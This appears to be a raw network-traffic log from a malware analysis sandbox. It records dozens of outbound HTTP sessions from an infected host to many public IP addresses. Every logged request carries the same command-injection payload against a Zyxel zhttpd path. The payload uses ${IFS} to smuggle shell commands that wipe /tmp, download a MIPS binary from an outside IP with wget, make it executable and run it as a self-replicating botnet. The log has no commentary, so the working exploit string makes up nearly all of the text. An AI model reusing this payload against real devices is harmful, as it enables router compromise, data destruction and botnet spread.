                                        Mar 31, 2024 09:20:50.489964008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2582192.168.2.235940032.114.141.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.490031958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2583192.168.2.2338574126.72.248.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.490080118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2584192.168.2.2340540116.168.188.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.490092993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2585192.168.2.2348136112.38.135.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.490120888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2586192.168.2.2357484198.20.6.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.490154982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2587192.168.2.233891645.175.232.168443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.490200996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2588192.168.2.2337452112.147.121.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.490252972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2589192.168.2.233965868.143.130.161443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.490295887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2590192.168.2.2344052160.161.46.58443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.490345001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2591192.168.2.2359106174.221.9.55443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.490369081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2592192.168.2.2335588170.150.239.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.490427017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2593192.168.2.2351484222.253.205.234443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.490459919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2594192.168.2.235132832.100.175.113443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.490509033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2595192.168.2.2353120132.53.32.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.490540028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2596192.168.2.235521279.162.240.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.490577936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2597192.168.2.2351594209.79.156.171443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.490622997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2598192.168.2.2347460107.45.34.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.490673065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2599192.168.2.2344184203.217.55.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.490701914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2600192.168.2.2359646183.190.212.215443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.490734100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2601192.168.2.233428417.241.251.201443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.490806103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2602192.168.2.2356522208.141.111.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.490813017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2603192.168.2.2358314118.37.156.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.490837097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2604192.168.2.235903275.166.212.198443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.490902901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2605192.168.2.2347226198.178.126.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.490938902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2606192.168.2.2339906186.154.102.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.490989923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2607192.168.2.233343441.218.55.191443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.491048098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2608192.168.2.2350170122.6.231.224443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:51.498420000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2609192.168.2.2360394144.166.161.73443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:51.498461008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2610192.168.2.234652819.113.171.221443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:51.498498917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2611192.168.2.234134664.45.124.211443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:51.498548985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2612192.168.2.2334674132.244.220.191443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:51.498605967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2613192.168.2.2357648194.128.180.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:51.498646021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2614192.168.2.2346474223.220.161.171443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:51.498708010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2615192.168.2.2345192118.22.221.107443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:51.498759031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2616192.168.2.235182434.239.213.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:51.498797894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2617192.168.2.2350092193.188.252.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:51.498873949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2618192.168.2.2353634165.177.88.91443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:51.498917103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2619192.168.2.2356424157.11.124.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:51.499305964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2620192.168.2.2345462221.177.152.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:51.508652925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2621192.168.2.2337860194.224.11.28443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:52.512451887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2622192.168.2.2359730155.100.150.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:52.512490988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2623192.168.2.234777898.112.62.237443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:52.512567997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2624192.168.2.2340874206.76.192.89443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:52.512718916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2625192.168.2.2333798190.16.122.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:52.512764931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2626192.168.2.2341512194.75.137.235443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.526093960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2627192.168.2.234163452.139.80.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.526187897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2628192.168.2.235778871.199.90.165443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.526295900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2629192.168.2.2357684212.183.180.155443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.526343107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2630192.168.2.2339304102.193.183.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.526396036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2631192.168.2.235805017.38.1.221443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.526479959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2632192.168.2.233282419.206.253.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.526547909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2633192.168.2.235341885.73.22.17443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.526619911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2634192.168.2.234069631.174.80.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.526660919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2635192.168.2.2335888184.91.34.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.526745081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2636192.168.2.2340832196.52.73.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.526824951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2637192.168.2.2345726218.206.118.192443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.526921034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2638192.168.2.2334476128.31.3.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.526977062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2639192.168.2.235984262.119.208.58443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.527045012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2640192.168.2.2340258223.146.245.137443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.527126074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2641192.168.2.233880819.66.131.96443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.527195930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2642192.168.2.234788682.168.215.211443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.527276039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2643192.168.2.235345882.219.252.108443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.527319908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2644192.168.2.233826632.106.86.204443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.527409077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2645192.168.2.234547040.162.94.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.527471066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2646192.168.2.234171469.167.213.195443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.527523994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2647192.168.2.234492467.71.94.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.527602911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2648192.168.2.233732041.241.215.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.527656078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2649192.168.2.234023050.139.96.182443
                                        TimestampBytes transferredDirectionData
